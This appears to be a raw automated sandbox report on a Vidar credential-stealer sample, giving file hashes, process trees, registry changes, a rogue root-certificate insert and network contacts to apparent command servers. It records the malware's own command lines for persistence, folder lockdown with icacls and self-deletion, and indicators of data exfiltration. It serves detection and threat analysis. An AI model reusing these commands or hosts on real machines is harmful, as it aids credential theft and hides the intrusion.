memory/4016-157-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.cmdline
| MD5 | 216e29c2b7df75e2ab7d14483718306c |
| SHA1 | 2914efd5305895b136167d03497dfe63179409ea |
| SHA256 | d0479dcacc294773d9f34e58b7660108a75c502c15cab49ad6f429f5c82d2a02 |
| SHA512 | 60aa8027f567a6fec0ec2c7a239ccff1a224c9c7109c89b7d49f5c8717b379ddc732ae905ec2ebe0bc46d6c4193182c535b507777f071b73b190a0c8df47f581 |
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/1036-160-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\CSC811B30464E124A8BB81DC0AA3893821C.TMP
| MD5 | 86852935139ed17789c2a9c597026ae6 |
| SHA1 | f21e57653e0ddc6fbd30eecdb8eb6a485bc4ae3a |
| SHA256 | ae72f91c628f21307027bc08243dd44799e6131d33206291c2c7fb6dd4958fe8 |
| SHA512 | 5e7f9ca3b383603dee85e6720f05ce1a71bb46235a053144362f76796f6537ae04ff6cc3389807df36ba27410fc1dd97df25b1921cfe5d4ab35cb228da9578ff |
C:\Users\Admin\AppData\Local\Temp\RES4730.tmp
| MD5 | 918e6777177726e9f4b8e62311c3f7ff |
| SHA1 | 80e487dd2c22c620b950f27a2856309332ac77a5 |
| SHA256 | 1d708f6c2134fe81b326b8d07994ae85934ab6796f8d81b5baf080701185aa83 |
| SHA512 | 444f2ec3782c9fcfbccffc93c3489be84e3dcb02d62e7c19b18ae19270449edf5bf76dd87d4a9784b0d3dd66e64c6b54273628817e1cd53b3f58d9feddad5bc4 |
C:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.dll
| MD5 | 530ac98589c992e8b76d9d9d7306d513 |
| SHA1 | 568561e8895835f6bf9cbb6428d1f31ade4988fe |
| SHA256 | 1d2bb8c42349a65afc31344d2d35d1f1e4d29099dbb8c84590e98a764ab65c51 |
| SHA512 | 551911896d9b70e4432a7b81dc4942f4aa901419045360b5debec2d61276cb4df5ad5269fba01abd6c4e66863525420868596b660525ec74ce324202ec9515fb |
memory/1752-164-0x00000222F2570000-0x00000222F2571000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1752-166-0x00000222F25C6000-0x00000222F25C8000-memory.dmp
memory/1752-169-0x00000222F25C8000-0x00000222F25C9000-memory.dmp
memory/1752-172-0x00000222F2C80000-0x00000222F2C81000-memory.dmp
memory/1752-173-0x00000222F3010000-0x00000222F3011000-memory.dmp
memory/2392-180-0x0000000000000000-mapping.dmp
memory/2392-187-0x00000235197C0000-0x00000235197C2000-memory.dmp
memory/2392-188-0x00000235197C3000-0x00000235197C5000-memory.dmp
memory/2392-214-0x00000235197C6000-0x00000235197C8000-memory.dmp
memory/4140-223-0x0000000000000000-mapping.dmp
memory/4140-233-0x000002B01F320000-0x000002B01F322000-memory.dmp
memory/2392-232-0x00000235197C8000-0x00000235197CA000-memory.dmp
memory/4140-234-0x000002B01F323000-0x000002B01F325000-memory.dmp
memory/4140-254-0x000002B01F326000-0x000002B01F328000-memory.dmp
memory/4416-264-0x0000000000000000-mapping.dmp
memory/4140-295-0x000002B01F328000-0x000002B01F32A000-memory.dmp
memory/4416-296-0x0000022E9CC00000-0x0000022E9CC02000-memory.dmp
memory/4416-297-0x0000022E9CC03000-0x0000022E9CC05000-memory.dmp
memory/4416-298-0x0000022E9CC06000-0x0000022E9CC08000-memory.dmp
memory/4832-321-0x0000000000000000-mapping.dmp
memory/4852-322-0x0000000000000000-mapping.dmp
memory/4872-323-0x0000000000000000-mapping.dmp
memory/5052-360-0x0000000000000000-mapping.dmp
memory/5072-361-0x0000000000000000-mapping.dmp
memory/5104-364-0x0000000000000000-mapping.dmp
memory/4100-365-0x0000000000000000-mapping.dmp
memory/680-366-0x0000000000000000-mapping.dmp
memory/4016-367-0x0000000000000000-mapping.dmp
memory/2784-368-0x0000000000000000-mapping.dmp
memory/4112-369-0x0000000000000000-mapping.dmp
memory/4120-370-0x0000000000000000-mapping.dmp
memory/3204-371-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/4312-374-0x0000000000000000-mapping.dmp
memory/4332-375-0x0000000000000000-mapping.dmp
memory/4220-376-0x0000000000000000-mapping.dmp
memory/4192-377-0x0000000000000000-mapping.dmp
memory/4168-378-0x0000000000000000-mapping.dmp
memory/4160-379-0x0000000000000000-mapping.dmp
memory/4560-380-0x0000000000000000-mapping.dmp
memory/4576-381-0x0000000000000000-mapping.dmp
memory/4636-382-0x0000000000000000-mapping.dmp
memory/4652-383-0x0000000000000000-mapping.dmp
memory/4532-384-0x0000000000000000-mapping.dmp
memory/4664-385-0x0000000000000000-mapping.dmp
memory/4732-386-0x0000000000000000-mapping.dmp
memory/4876-387-0x0000000000000000-mapping.dmp
memory/4940-388-0x0000000000000000-mapping.dmp
memory/4956-389-0x0000000000000000-mapping.dmp
memory/4956-396-0x0000027B2B883000-0x0000027B2B885000-memory.dmp
memory/4956-395-0x0000027B2B880000-0x0000027B2B882000-memory.dmp
memory/4956-404-0x0000027B2B886000-0x0000027B2B888000-memory.dmp
memory/4956-455-0x0000027B2B888000-0x0000027B2B889000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Setup.zip
| MD5 | 36f178576dcb8db35d6f06448b1eb510 |
| SHA1 | 62277c90cc2b1bb81b36571037afe5081b0605d5 |
| SHA256 | 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a |
| SHA512 | 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96 |
memory/4396-469-0x0000000000000000-mapping.dmp
memory/4204-470-0x0000000000000000-mapping.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win10v20210410
Max time kernel
149s
Max time network
167s
Command Line
Signatures
Vidar
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Modifies extensions of user files
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
"C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe"
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
"C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe --Task
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe --Task
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.2ip.ua | udp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 8.8.8.8:53 | securebiz.org | udp |
| N/A | 8.8.8.8:53 | astdg.top | udp |
| N/A | 211.168.197.211:80 | securebiz.org | tcp |
| N/A | 116.58.10.58:80 | astdg.top | tcp |
| N/A | 8.8.8.8:53 | shpak125.tumblr.com | udp |
| N/A | 74.114.154.18:443 | shpak125.tumblr.com | tcp |
| N/A | 116.202.183.50:80 | 116.202.183.50 | tcp |
| N/A | 8.8.8.8:53 | api.2ip.ua | udp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
Files
memory/3744-114-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3744-115-0x0000000000424141-mapping.dmp
memory/1696-116-0x0000000000C60000-0x0000000000D7B000-memory.dmp
memory/3468-117-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
memory/2696-119-0x0000000000000000-mapping.dmp
memory/3744-120-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3972-122-0x0000000000424141-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | efac2ed2ff1c33c0ae481634d5dedef1 |
| SHA1 | d74e4fcb20b4c78dd9a993565d262024f5e83c5d |
| SHA256 | 26b096b54a80f53a49b05927c87ea29ad304443e721ee204dec183f81eb16891 |
| SHA512 | 80eb2cd014f5e3da1e63f2300f977c5595bacf6e0754b3d32fbaed2a1eace4992db9bbbcb86af96f7cd5810bffd8bfaf0a1e389042554fa90ef008a07d88ffd3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 5ff584af05cab237078a6630a50548fe |
| SHA1 | de58d2ed9b44cd4fd89c45ea7136d0faf86a7d63 |
| SHA256 | a9d0645039bc6644e1f83f69c4d78cc3a9a3a55615921a0c44a8c5abd3404eac |
| SHA512 | 07c3dc4a07fd68ae982cffec18a8aa7ffc708b832aada915c653398aba8f61c212c64e971afa47eebb547d124e33a1d5e093c9235dfcee9386b4c43a93dcc4b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | da17784901c7cf8a3cc8bb124668de35 |
| SHA1 | bd7675acca171ec659a1282cab7ce0b03772bc96 |
| SHA256 | 6ab2a73a4684bdca1e9654b21ba1832402e562f8856b12da4af482ffbe5e7329 |
| SHA512 | b074907f9a2ee6f05a0cfac3f7988a0b5ae72a7e5074441736a5ab74ed2709a8049d73f691a0249b7a37901a90f794721f2f99eaee2ca8b2f4170b47ef7a5146 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 38b33d357b48f05e2e68d4f8a1db047a |
| SHA1 | 8ce535f29afb1fa588d7152fcc59f35cefc987ba |
| SHA256 | 74e458267a323f8bd03a94b9e476f734f925907f1d331d5faaec13dfaddd561e |
| SHA512 | e92bb39c16f71a3a42457e917cbf80cf1ec04e34b14c63b5650d3d485556cbb371c81053e263ac5aaa531c7705ab375c92d85f98a9a8cff173c01905bed1ce3f |
memory/3972-127-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3016-128-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/2728-131-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2728-132-0x000000000046B76D-mapping.dmp
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/2728-135-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/3016-134-0x0000000000640000-0x00000000006DE000-memory.dmp
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
memory/2588-138-0x0000000000000000-mapping.dmp
memory/3148-139-0x0000000000000000-mapping.dmp
memory/1452-140-0x0000000000000000-mapping.dmp
C:\ProgramData\freebl3.dll
| MD5 | ef2834ac4ee7d6724f255beaf527e635 |
| SHA1 | 5be8c1e73a21b49f353c2ecfa4108e43a883cb7b |
| SHA256 | a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba |
| SHA512 | c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2 |
C:\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
C:\ProgramData\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
C:\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
C:\ProgramData\softokn3.dll
| MD5 | a2ee53de9167bf0d6c019303b7ca84e5 |
| SHA1 | 2a3c737fa1157e8483815e98b666408a18c0db42 |
| SHA256 | 43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083 |
| SHA512 | 45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8 |
C:\ProgramData\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
memory/2784-149-0x0000000000424141-mapping.dmp
memory/2784-151-0x0000000000400000-0x0000000000537000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:36
Platform
win7v20210410
Max time kernel
115s
Max time network
178s
Command Line
Signatures
Vidar
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1140 set thread context of 1852 | N/A | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Program crash
| Description | Indicator | Process | Target |
